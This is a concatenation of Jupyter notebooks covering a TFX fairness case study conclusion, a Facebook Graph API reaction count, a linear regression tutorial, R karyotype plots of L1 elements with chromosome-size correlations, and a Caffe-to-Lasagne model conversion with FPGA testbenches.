display(_mlmd_model_to_dataframe(store.get_artifacts_by_type('Model'), -1))
display(_mlmd_model_to_dataframe(store.get_artifacts_by_type('Model'), 0))
# + [markdown] id="f0fGWt-OIzEb"
# ## Conclusion
#
# Within this case study we developed a Keras classifier within a TFX pipeline on the COMPAS dataset to examine fairness concerns. After initially developing the TFX pipeline, the fairness concerns were not immediately apparent until we examined the individual slices of our model by our sensitive feature, in our case race. After identifying the issues, we used TensorFlow Data Validation to track down the source of the fairness issue and mitigated it via model weighting, while tracking and annotating the changes via ML Metadata. Although we were not able to fully fix all the fairness concerns within the dataset, adding a note for future developers to follow will allow others to understand the issues we faced while developing this model.
#
# Finally, it is important to note that this case study did not fix the fairness issues that are present in the COMPAS dataset; by improving the fairness concerns in the model we also reduced its AUC and accuracy. What we were able to do, however, was build a model that surfaced the fairness concerns and track down where the problems could be coming from by tracing our model's lineage, while annotating any model concerns within the metadata.
#
# For more information on the issues that predicting pre-trial detention can have, see the FAT* 2018 talk ["Understanding the Context and Consequences of Pre-trial Detention"](https://www.youtube.com/watch?v=hEThGT-_5ho&feature=youtu.be&t=1).
| g3doc/tutorials/_Deprecated_Fairness_Indicators_Lineage_Case_Study.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Retrieving a post's reactions
import requests
# We will define the base URL used to make the requests.
url_base = 'https://graph.facebook.com/v2.7'
# Now we will use a node (post) that we retrieved in the previous lesson.
id_post = '/134488303306371_1056521637769695'
no = id_post
# Let's build the part of the URL where we define the fields we want to retrieve; in this case, `reactions`.
campos = '/?fields=reactions'
# Finally, we have to build the part of the URL that contains the access token.
access_token = '&access_token=<KEY>'
url_final = url_base+no+campos+access_token
url_final
# With the final URL, we can make the request.
req = requests.get(url_final).json()
import simplejson as json
print(json.dumps(req, indent=2))
# Great! The data was retrieved!
#
# Now we can count the reactions of a given post.
tipos_reacoes = ['LIKE','LOVE', 'WOW', 'HAHA', 'SAD', 'ANGRY']
dados = req['reactions']['data']
contagem = dict(zip(tipos_reacoes, [0,0,0,0,0,0]))
for reacao in dados:
contagem[reacao['type']] += 1
contagem
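The manual tally above can also be written with `collections.Counter`. A minimal sketch over a mock `reactions.data` list (the entries below are made-up stand-ins for a real Graph API response):

```python
from collections import Counter

# Mock of the `reactions.data` list returned by the Graph API (hypothetical values)
dados = [
    {"id": "1", "type": "LIKE"},
    {"id": "2", "type": "LOVE"},
    {"id": "3", "type": "LIKE"},
]

tipos_reacoes = ['LIKE', 'LOVE', 'WOW', 'HAHA', 'SAD', 'ANGRY']

# Start from zeroed keys so reaction types that never occur still appear
contagem = Counter({tipo: 0 for tipo in tipos_reacoes})
contagem.update(reacao['type'] for reacao in dados)

print(dict(contagem))
```

Starting from zeroed keys keeps the output shape fixed regardless of which reactions a post actually received.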
| Python/2016-08-08/aula7-parte1-reacoes.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 2
# language: python
# name: python2
# ---
# +
# linear_regression.m.
# <NAME>
#
import matplotlib.pyplot as plt
import numpy as np
import numpy.linalg as lin
import matplotlib.patches as mpatches
#Dataset: brainhead.txt
#Source: <NAME> (1905). "A Study of the Relations of the Brain
#to the Size of the Head", Biometrika, Vol. 4, pp105-123
#Description: Brain weight (grams) and head size (cubic cm) for 237
#adults
#Variables
#First column Head size (cm^3)
#Second column Brain weight (grams)
br=np.loadtxt("brainhead.txt")
br_x=br[:,0] # x independent variable/experimental variable/predictor variable, (head size )
br_y=br[:,1] # y dependent variable/outcome variable (Brain weight )
n=np.size(br_y) # data size
plt.plot(br_x,br_y,'bd') # Plot the data; marker 'bd' =blue diamonds
plt.title ('Data from R.J.Gladstone study, 1905')
plt.xlabel('Head size, cm^3'); # Set the x-axis label
plt.ylabel('Brain weight (grams) '); # Set the y-axis label
plt.show()
# +
import numpy as np
#Now, we want to allow a non-zero intercept for our linear equation.
#That is, we don't want to require that our fitted equation go through the origin.
#In order to do this, we need to add a column of all ones to our x column.#
# To make sure that regression line does not go through origin
# add a column of all ones (intercept term) to x
# BR_X = [ones(n, 1) br_x];
BR_X = np.vstack([br_x, np.ones(len(br_x))]).T
# and compare the results.
# Given a matrix equation
# X * theta=y,
# the normal equation is that which minimizes the sum of the square differences
# between the left and right sides:
# X'*X*theta=X'*y.
# It is called a normal equation because y-X*theta is normal to the range of X.
# Here, X'*X is a normal matrix.
# Putting that into Octave:
# Calculate theta
# theta = (pinv(X'*X))*X'*y
# Or simply use the backslash (mldivide) operator
theta = lin.lstsq(BR_X,br_y)[0]
#minimize norm(X*theta-y) via a QR factorization
# we can also use the equivalent command
# theta=mldivide(X,y)
# Since BR_X stores the data column first and the intercept column second,
# you should get theta = [ 0.26343 325.57342 ], i.e. slope then intercept.
# This means that our fitted equation is as follows:
# y = 0.26343x + 325.57342.
br_y_est = theta[0]*BR_X[:,0] + theta[1]  # slope*x + intercept
# Now, let's plot our fitted equation (prediction) on top
# of the training data, to see if our fitted equation makes
# sense.
# Plot the fitted equation we got from the regression
#tr_plot=plt.plot(br_x,br_y,'rd',label='Training data')
#lin_reg= plt.plot(br_x,br_y_est,'b-', label='Linear Regression') # Plot the data; marker 'bd' =blue diamonds
plt.plot(br_x,br_y,'bd',br_x,br_y_est,'r-')
plt.title ('Data from R.J.Gladstone study, 1905')
plt.xlabel('Head size, cm^3'); # Set the x-axis label
plt.ylabel('Brain weight (grams) '); # Set the y-axis label
plt.legend(('Training data','Linear regression'),loc='upper left')
plt.show()
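As a check on the comments above, the normal-equation solution theta = pinv(X'X) X'y and `lstsq` should agree. A small sketch on synthetic data (hypothetical values, not the brainhead dataset):

```python
import numpy as np
import numpy.linalg as lin

np.random.seed(0)
x = np.random.uniform(0, 10, 50)
y = 2.5 * x + 7.0 + np.random.normal(0, 0.1, 50)

# Same layout as BR_X above: data column first, then the intercept column
X = np.vstack([x, np.ones(len(x))]).T

# Normal equation: theta = pinv(X'X) X'y
theta_normal = np.dot(lin.pinv(np.dot(X.T, X)), np.dot(X.T, y))

# QR-based least squares, the same minimizer
theta_lstsq = lin.lstsq(X, y, rcond=None)[0]

print(theta_normal, theta_lstsq)
```

Both routes recover approximately [2.5, 7.0]; `lstsq` is preferred in practice because it avoids explicitly forming X'X.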
# +
# Evaluate each fit you make in the context of your data. For example,
# if your goal of fitting the data is to extract coefficients that have
# physical meaning, then it is important that your model reflect the
# physics of the data. Understanding what your data represents,
# how it was measured, and how it is modeled is important when evaluating
# the goodness of fit.
# One measure of goodness of fit is the coefficient of determination,
# or R^2 (pronounced r-square). This statistic indicates how closely
# values you obtain from fitting a model match the dependent variable
# the model is intended to predict. Statisticians often define R^2
# using the residual variance from a fitted model:
# R^2 = 1 - SSresid / SStotal
# SSresid is the sum of the squared residuals from the regression.
# SStotal is the sum of the squared differences from the mean
# of the dependent variable (total sum of squares). Both are positive scalars.
# Residuals are the difference between the observed values of the response (dependent)
# variable and the values that a model predicts. When you fit a model that is
# appropriate for your data, the residuals approximate independent random errors.
# That is, the distribution of residuals ought not to exhibit a discernible pattern.
# Producing a fit using a linear model requires minimizing the sum of the squares
# of the residuals. This minimization yields what is called a least-squares fit.
# You can gain insight into the "goodness" of a fit by visually examining a plot
# of the residuals. If the residual plot has a pattern (that is, residual data
# points do not appear to have a random scatter), the lack of randomness indicates
# that the model does not properly fit the data.
# The higher the value of R-square , the better the model is at predicting the data.
# Say if Rsq is 0.7, we can say that 70% of the variation in dependent
# variable is explained by the independent variable.
residuals=br_y-br_y_est
Rsq = 1 - sum(residuals**2)/sum((br_y - np.mean(br_y))**2)
# -
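The R^2 = 1 - SSresid/SStotal definition in the comments above is easy to sanity-check on synthetic data, where a near-noiseless linear relationship should give an R-square close to 1:

```python
import numpy as np

np.random.seed(1)
x = np.linspace(0, 10, 100)
y = 3.0 * x + 1.0 + np.random.normal(0, 0.05, 100)

# Fit a first-degree polynomial (a line) and evaluate it
slope, intercept = np.polyfit(x, y, 1)
y_est = slope * x + intercept

ss_resid = np.sum((y - y_est) ** 2)   # sum of squared residuals
ss_total = np.sum((y - np.mean(y)) ** 2)  # total sum of squares
r_squared = 1 - ss_resid / ss_total
print(r_squared)
```

With noise this small the fitted line explains almost all of the variation, so r_squared lands just below 1.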
# also examine mean and standard deviation of residuals.
mean_residuals=np.mean(residuals)
std_residuals=np.std(residuals)
# +
x_range= range(0,n)
ref=np.zeros(n)  # zero reference line for the residuals
plt.plot(x_range,residuals,'bo',x_range,ref,'r-')
plt.xlabel('data index')
plt.ylabel('residuals')
plt.legend(('residuals','zero line'), loc='upper right')
plt.show()
# -
| ML_Notebook/Linear Regression/.ipynb_checkpoints/linear_regression-checkpoint.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python [conda env:rbruce]
# language: python
# name: conda-env-rbruce-py
# ---
# ## Karyotype plots of all L1s by datasets + Correlation analysis of element # and chr size
# ### 1. Karyotype Plots
##Karyotype plot of L1s
# !cd ~/Google_Drive/L1/L1_Project/Analysis/Karyotype_plots/
# %load_ext rpy2.ipython
# + language="R"
# library("rtracklayer")
# library(karyoploteR)
# library(GenomicRanges)
# + language="R"
# #Load the data
# #L1_denovo<-read.table("L1denovo_BWA_merged4_undecidable_100kb_no_gaps_no_blacklisted.interval",sep="\t")[,1:3]
# L1_denovo<-read.table("L1denovo_BWA_17037_for_karyotype.bed",sep="\t")[,1:3]
# names(L1_denovo)=c('chr','start','end')
# #class(G137_Br)
# #head(G137_Br)
# ## Karyotype plot with "karyoploteR",
# gains <- makeGRangesFromDataFrame(L1_denovo) ## Import target positions
# #head(gains)
# length(gains)
# -
# !tail L1denovo_BWA_17037_for_karyotype.bed
# + language="R"
# ## Plot de novo
# pdf('L1_denovo.pdf',width=15, height=13)
# pp <- getDefaultPlotParams(plot.type=1)
# pp$leftmargin <- 0.1
# pp$data1height <- 80
# kp<-plotKaryotype(genome="hg19", main="de novo L1s",plot.type=1, plot.params = pp) ## Set genome assembly
# #kpPlotRegions(kp, gains,col="red",avoid.overlapping=FALSE ) ## Choose color
# #getCytobandColors(color.table=NULL, color.schema=c("only.centromeres"))
# kpPlotRegions(kp, gains,col="red") ## Choose color
# kpAddCytobandLabels(kp,cex=0.5)
# dev.off()
# + language="R"
# #Load the data
# #L1_pol<-read.table("L1_Pol_clean.bed",sep="\t")[,1:3]
# L1_pol<-read.table("PolyL1_Ewing_LiftOver_18to19_1012_for_karyotype.bed",sep="\t")[,1:3]
# names(L1_pol)=c('chr','start','end')
# #class(G137_Br)
# #head(G137_Br)
# ## Karyotype plot with "karyoploteR",
# gains <- makeGRangesFromDataFrame(L1_pol) ## Import target positions
# #head(gains)
# length(gains)
# + language="R"
# ## Plot L1 pol
# pdf('L1_pol.pdf',width=15, height=13)
# pp <- getDefaultPlotParams(plot.type=1)
# pp$leftmargin <- 0.1
# pp$data1height <- 80
# kp<-plotKaryotype(genome="hg19", main="Polymorphic L1s",plot.type=1, plot.params = pp) ## Set genome assembly
# #kpPlotRegions(kp, gains,col="red",avoid.overlapping=FALSE ) ## Choose color
# getCytobandColors(color.table=NULL, color.schema=c("only.centromeres"))
# kpPlotRegions(kp, gains,col="blue") ## Choose color
# kpAddCytobandLabels(kp,cex=0.5)
# dev.off()
# + language="R"
# #Load the data
# #L1_hs<-read.table("L1HS_UCSC.bed",sep="\t")[,1:3]
# L1_hs<-read.table("L1HS_clean_sorted_1205.bed",sep="\t")[,1:3]
# names(L1_hs)=c('chr','start','end')
# #class(G137_Br)
# #head(G137_Br)
# ## Karyotype plot with "karyoploteR",
# gains <- makeGRangesFromDataFrame(L1_hs) ## Import target positions
# #head(gains)
# length(gains)
# + language="R"
# ## Plot L1 hs
# pdf('L1_hs.pdf',width=15, height=13)
# pp <- getDefaultPlotParams(plot.type=1)
# pp$leftmargin <- 0.1
# pp$data1height <- 80
# kp<-plotKaryotype(genome="hg19", main="Human-specific L1s",plot.type=1, plot.params = pp) ## Set genome assembly
# #kpPlotRegions(kp, gains,col="red",avoid.overlapping=FALSE ) ## Choose color
# getCytobandColors(color.table=NULL, color.schema=c("only.centromeres"))
# kpPlotRegions(kp, gains,col="green") ## Choose color
# kpAddCytobandLabels(kp,cex=0.5)
# dev.off()
# + language="R"
# #Overlay all L1s in the same karyotype plot
# #The per-dataset cells above each overwrote `gains`, so rebuild the three GRanges objects first
# gains_denovo <- makeGRangesFromDataFrame(L1_denovo)
# gains_pol <- makeGRangesFromDataFrame(L1_pol)
# gains_hs <- makeGRangesFromDataFrame(L1_hs)
# pdf('L1_ALL.pdf',width=15, height=13)
# pp <- getDefaultPlotParams(plot.type=1)
# pp$leftmargin <- 0.1
# pp$data1height <- 60
# kp<-plotKaryotype(genome="hg19", main="Genome-wide distribution of all L1s in the study",plot.type=1, plot.params = pp, cex=1.6) ## Set genome assembly
# #kpPlotRegions(kp, gains,col="red",avoid.overlapping=FALSE ) ## Choose color
# getCytobandColors(color.table=NULL, color.schema=c("only.centromeres"))
# kpPlotRegions(kp, r0 = 0, r1 = 2,gains_denovo,col="red") ## Choose color
# kpPlotRegions(kp, r0 = 0, r1 = 0.8,gains_pol, col="blue") ## Choose color
# kpPlotRegions(kp, r0 = 0, r1 = 0.8,gains_hs, col="green") ## Choose color
# kpAddCytobandLabels(kp,cex=0.8)
# dev.off()
# -
# ### 2. Correlation analysis: Number of elements vs. Chr size
#
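The analysis this section sets up -- regressing element count per chromosome on chromosome size and reporting R-squared -- can be sketched equivalently in Python. The chromosome sizes and element assignments below are made-up toy values, not the L1 data:

```python
import numpy as np

# Toy stand-ins: chromosome sizes (bp) and the chromosome of each element
chrom_sizes = {'chr1': 249e6, 'chr2': 243e6, 'chr3': 198e6, 'chr4': 191e6}
element_chrs = ['chr1'] * 50 + ['chr2'] * 48 + ['chr3'] * 40 + ['chr4'] * 39

# Count elements per chromosome (mirrors R's table())
chrs, counts = np.unique(element_chrs, return_counts=True)
sizes = np.array([chrom_sizes[c] for c in chrs])

# Fit count ~ size and compute R^2, mirroring lm() + summary(fit)$r.squared
slope, intercept = np.polyfit(sizes, counts, 1)
pred = slope * sizes + intercept
r_squared = 1 - np.sum((counts - pred) ** 2) / np.sum((counts - counts.mean()) ** 2)
print(r_squared)
```

On these toy values the counts track chromosome size almost linearly, so the R-squared is high; the real L1 datasets in this section show weaker but still substantial correlations.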
## Get chromosome size (hg19) from UCSC
# #!wget http://hgdownload.cse.ucsc.edu/goldenPath/hg19/bigZips/hg19.chrom.sizes
# !head hg19.chrom.sizes
# + language="R"
# ## Read chr size into R, sort and remove chr Y/unknown
# chrom_size<-read.table('hg19.chrom.sizes', header=FALSE, sep='\t')[1:24,]
# colnames(chrom_size)=c('chr','size')
# chrom_size_sorted <- chrom_size[order(chrom_size$chr),]
# #head(chrom_size_sorted,24)
# chrom_size_sorted_clean <- chrom_size_sorted[1:23,]
# head(chrom_size_sorted_clean)
#
# -
# ### de novo L1
# + language="R"
# ## Read de novo L1s and calculate element count per chr
# l1denovo<-read.table('L1denovo_BWA_17037_for_karyotype.bed', header=FALSE, sep='\t')[,1]
# l1denovo_count <- as.data.frame(table(l1denovo))
# colnames(l1denovo_count)=c('chr','count')
# head(l1denovo_count)
# + language="R"
# l1denovo_size_count <- merge(chrom_size_sorted_clean,l1denovo_count,by="chr")
# l1denovo_size_count
# + language="R"
# fit1<-lm(count~size,data=l1denovo_size_count)
# #cor(l1denovo_size_count[,2],l1denovo_size_count[,3])
# summary(fit1)$r.squared
# + language="R"
# require(ggplot2)
# + language="R"
# #pdf(file='denovoL1_vs_chrsize.pdf')
#
# ##Plot chr size against element (regression line with 95% CI)
# ggplot(l1denovo_size_count, aes(size,count)) + geom_point(colour='red') +
# geom_smooth(method=lm,colour='red') + geom_text(size=2.9,aes(label=chr),hjust=0, vjust=1)+
# theme(legend.position = "none") +
# theme(plot.margin = margin(8,8,8,8)) +
# xlab("Chromosome Size") + ylab("Count of Elements") + theme(plot.title = element_text(hjust = 0.5)) + ggtitle("Count of de novo L1s by Chromosome Size \n(R-squared=0.59)")
#
# #ggsave("denovoL1_vs_chrsize.pdf")
#
# -
# ### Polymorphic L1s
# + language="R"
# ## Read polymorphic L1s and calculate element count per chr
# l1pol<-read.table('PolyL1_Ewing_LiftOver_18to19_1012_for_karyotype.bed', header=FALSE, sep='\t')[,1]
# #length(l1pol)
# l1pol_count <- as.data.frame(table(l1pol))
# colnames(l1pol_count)=c('chr','count')
# head(l1pol_count)
# + language="R"
# l1pol_size_count <- merge(chrom_size_sorted_clean,l1pol_count,by="chr")
# l1pol_size_count
# + language="R"
# #cor(l1pol_size_count[,2],l1pol_size_count[,3])
# fit2<-lm(count~size,data=l1pol_size_count)
# summary(fit2)$r.squared
# + language="R"
# ##Plot chr size against element (regression line with 95% CI)
# require(ggplot2)
# ggplot(l1pol_size_count, aes(size,count)) + geom_point(colour='blue') +
# geom_smooth(method=lm,colour='blue') + geom_text(size=2.9,aes(label=chr),hjust=0, vjust=1)+
# theme(legend.position = "none") +
# theme(plot.margin = margin(8,8,8,8)) +
# xlab("Chromosome Size") + ylab("Count of Elements") +
# theme(plot.title = element_text(hjust = 0.5)) +
# ggtitle("Count of Polymorphic L1s by Chromosome Size \n(R-squared=0.86)")
#
# #ggsave("polymorphicL1_vs_chrsize.pdf")
#
# -
# ### L1HS
# + language="R"
# ## Read l1hs and calculate element count per chr
# l1hs<-read.table('L1HS_clean_sorted_1205.bed', header=FALSE, sep='\t')[,1]
# #colnames(l1hs)=c('chr')
# #head(l1hs)
# l1hs_count <- as.data.frame(table(l1hs))
# colnames(l1hs_count)=c('chr','count')
# head(l1hs_count)
# + language="R"
# l1hs_size_count <- merge(chrom_size_sorted_clean,l1hs_count,by="chr")
# l1hs_size_count
# + language="R"
# #cor(l1hs_size_count[,2],l1hs_size_count[,3])
# fit3<-lm(count~size,data=l1hs_size_count)
# summary(fit3)$r.squared
# + language="R"
# ##Plot chr size against element (regression line with 95% CI)
# #attach(l1hs_size_count)
# #plot(size~count, lab=chr)
# require(ggplot2)
# ggplot(l1hs_size_count, aes(size,count)) + geom_point(colour='green') +
# geom_smooth(method=lm,colour='green') + geom_text(size=2.9,aes(label=chr),hjust=0, vjust=1)+
# theme(legend.position = "none") +
# theme(plot.margin = margin(8,8,8,8)) +
# xlab("Chromosome Size") + ylab("Count of Elements") +
# theme(plot.title = element_text(hjust = 0.5)) +
# ggtitle("Count of Human-specific L1s by Chromosome Size \n(R-squared=0.75)")
#
# #ggsave("L1HS_vs_chrsize.pdf")
#
| Analysis/Karyotype_plots/L1s_Karyotype_SizeCorrelation.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Introduction
#
# This example demonstrates how to convert a network from [Caffe's Model Zoo](https://github.com/BVLC/caffe/wiki/Model-Zoo) for use with Lasagne. We will be using the Caffe version of the CIFAR-10 quick model.
#
# We will create a set of Lasagne layers corresponding to the Caffe model specification (prototxt), then copy the parameters from the caffemodel file into our model.
# # Converting from Caffe to Lasagne
# ### Download the required files
#
# First we download `cifar10_nin.caffemodel` and `model.prototxt`. The supplied `train_val.prototxt` was modified to replace the data layers with an input specification, and remove the unneeded loss/accuracy layers.
# ### Import Caffe
#
# To load the saved parameters, we'll need to have Caffe's Python bindings installed.
import sys
caffe_root = '/home/xilinx/caffe/' # this file should be run from {caffe_root}/examples (otherwise change this line)
sys.path.insert(0, caffe_root + 'python')
import caffe
# ### Load the pretrained Caffe network
net_caffe = caffe.Net('CIFAR_10.prototxt', 'cifar10_quick_iter_5000.caffemodel.h5', caffe.TEST)
# ### Import Lasagne
import lasagne
from lasagne.layers import InputLayer, DropoutLayer, DenseLayer, NonlinearityLayer
#from lasagne.layers.dnn import Conv2DDNNLayer as ConvLayer
from lasagne.layers import Conv2DLayer as ConvLayer
from lasagne.layers import Pool2DLayer as PoolLayer
from lasagne.nonlinearities import softmax, rectify, linear
import conv_fpga
from conv_fpga import FPGA_CIFAR10
from conv_fpga import FPGAQuickTest
#from conv_fpga import Conv2DLayer as ConvLayer
from conv_fpga import FPGAWeightLoader as FPGALoadW
from lasagne.utils import floatX
# ### Create a Lasagne network
# Layer names match those in `model.prototxt`
net = {}
net['input'] = InputLayer((None, 3, 32, 32))
net['conv1'] = ConvLayer(net['input'], num_filters=32, filter_size=5, pad=2, nonlinearity=None)
net['pool1'] = PoolLayer(net['conv1'], pool_size=2, stride=2, mode='max', ignore_border=False)
net['relu1'] = NonlinearityLayer(net['pool1'], rectify)
net['conv2'] = ConvLayer(net['relu1'], num_filters=32, filter_size=5, pad=2, nonlinearity=rectify)
net['pool2'] = PoolLayer(net['conv2'], pool_size=2, stride=2, mode='average_exc_pad', ignore_border=False)
net['conv3'] = ConvLayer(net['pool2'], num_filters=64, filter_size=5, pad=2, nonlinearity=rectify)
net['pool3'] = PoolLayer(net['conv3'], pool_size=2, stride=2, mode='average_exc_pad', ignore_border=False)
net['ip1'] = DenseLayer(net['pool3'], num_units=64, nonlinearity = None)
net['ip2'] = DenseLayer(net['ip1'], num_units=10, nonlinearity = None)
net['prob'] = NonlinearityLayer(net['ip2'], softmax)
# ### Copy the parameters from Caffe to Lasagne
# +
import numpy as np
layers_caffe = dict(zip(list(net_caffe._layer_names), net_caffe.layers))
for name, layer in net.items():
try:
# layer.W.set_value(layers_caffe[name].blobs[0].data)
# layer.b.set_value(layers_caffe[name].blobs[1].data)
if name=='ip1'or name=='ip2':
layer.W.set_value(np.transpose(layers_caffe[name].blobs[0].data))
layer.b.set_value(layers_caffe[name].blobs[1].data)
# print((layers_caffe[name].blobs[0].data.shape))
# print(np.amax(layers_caffe[name].blobs[0].data))
# print(np.amin(layers_caffe[name].blobs[0].data))
else:
layer.W.set_value(layers_caffe[name].blobs[0].data[:,:,::-1,::-1])
layer.b.set_value(layers_caffe[name].blobs[1].data)
# print((layers_caffe[name].blobs[0].data.shape))
# print(np.amax(layers_caffe[name].blobs[0].data))
# print(np.amin(layers_caffe[name].blobs[0].data))
except AttributeError:
continue
# -
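The `[:,:,::-1,::-1]` kernel flip used above when copying convolutional weights reflects a convention difference: Caffe computes cross-correlation, while Lasagne's default `Conv2DLayer` flips filters (true convolution). The 1D analogue of this relationship is easy to verify with NumPy -- correlating with a reversed kernel equals convolving with the original:

```python
import numpy as np

signal = np.array([1.0, 2.0, 3.0, 4.0, 5.0])
kernel = np.array([0.5, 1.0, -0.5])

# Convolution flips the kernel internally; correlation does not.
conv = np.convolve(signal, kernel, mode='valid')
corr = np.correlate(signal, kernel[::-1], mode='valid')

print(conv, corr)  # identical
```

This is why weights trained under one convention must be reversed along the spatial axes before loading into a layer that uses the other.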
# ### Copy the parameters from CPU to FPGA OnChip Memory
#FPGALoadW(weight, status, IFDim, OFDim, PadDim)
weight = net['conv1'].W.get_value()
FPGALoadW(weight, 1, 32, 32, 2)
weight = net['conv2'].W.get_value()
FPGALoadW(weight, 2, 16, 16, 2)
weight = net['conv3'].W.get_value()
FPGALoadW(weight, 3, 8, 8, 2)
weight = net['ip1'].W.get_value()
weight = np.transpose(weight)
weight = weight.reshape(64, 64, 4, 4)
FPGALoadW(weight, 4, 4, 1, 0, flip_filters=False)
weight = net['ip2'].W.get_value()
weight = np.transpose(weight)
weight = weight.reshape(10, 64, 1, 1)
FPGALoadW(weight, 5, 1, 1, 0, flip_filters=False)
# # Trying it out
# Let's see if that worked.
#
# ### Import numpy and set up plotting
# ### Import time
# +
import gzip
import _pickle as cPickle
import matplotlib.pyplot as plt
import time
# %matplotlib inline
# -
# ### Download some test data
# Load CIFAR_10 test data.
data = np.load('cifar10.npz')
mean_image = np.load('mean_image.npy')
data_zeromean = data['raw'] - mean_image
# print(np.shape(data['whitened'][0:1]))
# print(np.amax(data['raw'][0:1]))
# print(np.amin(data['raw'][0:1]))
##
def make_image(X):
im = np.swapaxes(X.T, 0, 1)
im = im - im.min()
im = im * 1.0 / im.max()
return im
plt.figure(figsize=(5, 5))
plt.imshow(make_image(data['raw'][0]), interpolation='nearest')
# ### FPGA Deployment (CIFAR10 Layer)
FPGA_net = {}
FPGA_net['input'] = InputLayer((None, 3, 32, 32))
FPGA_net['cifar10'] = FPGA_CIFAR10(FPGA_net['input'])
FPGA_net['prob'] = NonlinearityLayer(FPGA_net['cifar10'], softmax)
# +
batch_size = 500
# %time prob = lasagne.layers.get_output(FPGA_net['cifar10'], floatX(data_zeromean[0:batch_size]), deterministic=True)#.eval()
FPGA_predicted = np.argmax(prob, 1)
# -
FPGA_accuracy = np.mean(FPGA_predicted == data['labels'][0:batch_size])
print(FPGA_predicted)
print(data['labels'][0:batch_size])
print(FPGA_accuracy)
# ### FPGA Deployment (QuickTest Function)
# +
batch_size = 2
OFMDim = 1
OFMCH = 10
# %time FPGA_output = FPGAQuickTest(data_zeromean*0.85, batch_size, OFMDim, OFMCH)
FPGA_predicted = np.argmax(FPGA_output.reshape(batch_size, -1), 1)
#np.save('FPGA_output', FPGA_output)
# -
FPGA_accuracy = np.mean(FPGA_predicted == data['labels'][0:batch_size])
print(FPGA_accuracy)
# ### Testbench: Check output for each layer
conv_output = lasagne.layers.get_output(net['ip2'], floatX(data['raw'][0:1]), deterministic=True).eval()
print('upper bound', np.amax(conv_output))
print('lower bound', np.amin(conv_output))
print(conv_output.shape)
print(conv_output)
# np.allclose(FPGA_output, conv_output)
# np.save('cpu_output', conv_output)
A = np.load('FPGA_output.npy')
B = np.load('cpu_output.npy')
print('A',A[4])
print('B',B[4])
np.allclose(A,B)
#print(np.amax(B))
# +
## Testbench for a single conv layer
net1 = {}
net1['input_1'] = InputLayer((None, 1, 28, 28))
net1['conv_1'] = ConvLayer(net1['input_1'], num_filters=20, filter_size=5, pad=0, nonlinearity=linear)
weight = np.random.rand(20, 1, 5, 5)*2-1
#weight = weight[...,::-1,::-1]
print('weight shape',weight.shape)
net1['conv_1'].W.set_value(weight)
input = np.random.rand(1, 1, 28, 28)
print('input shape',input.shape)
conv_output_test = lasagne.layers.get_output(net1['conv_1'], floatX(input), deterministic=True).eval()
print(conv_output_test)
print('max', np.amax(conv_output_test))
print('min', np.amin(conv_output_test))
print('##############################')
FPGALoadW(weight, 1, 28, 24, 0)
FPGA_output = FPGAQuickTest(input, 1, 24, 20)
print(FPGA_output)
print('max', np.amax(FPGA_output))
print('min', np.amin(FPGA_output))
np.allclose(conv_output_test, FPGA_output)
# +
## Testbench for a single ip layer
net2 = {}
net2['input_2'] = InputLayer((None, 50, 4, 4))
net2['ip_2'] = DenseLayer(net2['input_2'], num_units=500, nonlinearity=rectify)
weight = np.random.rand(800,500)*2-1
#weight = np.arange(32)/32
#weight = weight.reshape(8,4)
#print('weight (caffe)',weight)
net2['ip_2'].W.set_value(weight)
input = np.random.rand(1, 50, 4, 4)
#input = np.arange(8)/8
#input = input.reshape(1,2,2,2)
#print('input (caffe)',input)
conv_output_test = lasagne.layers.get_output(net2['ip_2'], floatX(input), deterministic=True).eval()
print(conv_output_test)
print('max', np.amax(conv_output_test))
print('min', np.amin(conv_output_test))
print('##############################')
weight = np.transpose(weight)
weight = weight.reshape(500, 50, 4, 4)
#print('weight (fpga)',weight)
#weight = weight[...,::-1,::-1]
FPGALoadW(weight, 3, 4, 1, 0, flip_filters=False)
#print('input (fpga)',input)
FPGA_output = FPGAQuickTest(input, 1, 1, 500)
print(FPGA_output.reshape(1,500))
print('max', np.amax(FPGA_output))
print('min', np.amin(FPGA_output))
np.allclose(conv_output_test, FPGA_output)
# -
# ### Make predictions on the test data
start_time = time.process_time()
prob = np.array(lasagne.layers.get_output(net['prob'], floatX(data_zeromean[0:500]), deterministic=True).eval())
predicted = np.argmax(prob, 1)
end_time = time.process_time()
print("Elapsed Test Time: ", end_time-start_time)
# ### Check our accuracy
# We expect around 75%
accuracy = np.mean(predicted == data['labels'][0:500])
print(predicted)
print(data['labels'][0:500])
print(accuracy)
# +
wrong = predicted != data['labels'][0:500]
wrong_ind = [i for i,x in enumerate(wrong) if x == 1]
print(wrong_ind)
def make_image(X):
im = np.swapaxes(X.T, 0, 1)
im = im - im.min()
im = im * 1.0 / im.max()
return im
plt.figure(figsize=(16, 5))
for i in range(0, 10):
plt.subplot(1, 10, i+1)
plt.imshow(make_image(data['raw'][wrong_ind[i]]), interpolation='nearest')
true = data['labels'][wrong_ind[i]]
pred = predicted[wrong_ind[i]]
color = 'green' if true == pred else 'red'
plt.text(0, 0, true, color='black', bbox=dict(facecolor='white', alpha=1))
plt.text(0, 32, pred, color=color, bbox=dict(facecolor='white', alpha=1))
plt.axis('off')
# -
# ### Double check
# Let's compare predictions against Caffe
net_caffe.blobs['data'].reshape(500, 3, 32, 32)
net_caffe.blobs['data'].data[:] = data['raw'][0:500]
prob_caffe = net_caffe.forward()['prob']#[:,:,0,0]
np.allclose(prob, prob_caffe)
# print(prob)
# print(prob_caffe)
# ### Graph some images and predictions
# +
def make_image(X):
im = np.swapaxes(X.T, 0, 1)
im = im - im.min()
im = im * 1.0 / im.max()
return im
plt.figure(figsize=(16, 5))
for i in range(0, 10):
plt.subplot(1, 10, i+1)
plt.imshow(make_image(data['raw'][i]), interpolation='nearest')
true = data['labels'][i]
pred = FPGA_predicted[i]
color = 'green' if true == pred else 'red'
plt.text(0, 0, true, color='black', bbox=dict(facecolor='white', alpha=1))
plt.text(0, 32, pred, color=color, bbox=dict(facecolor='white', alpha=1))
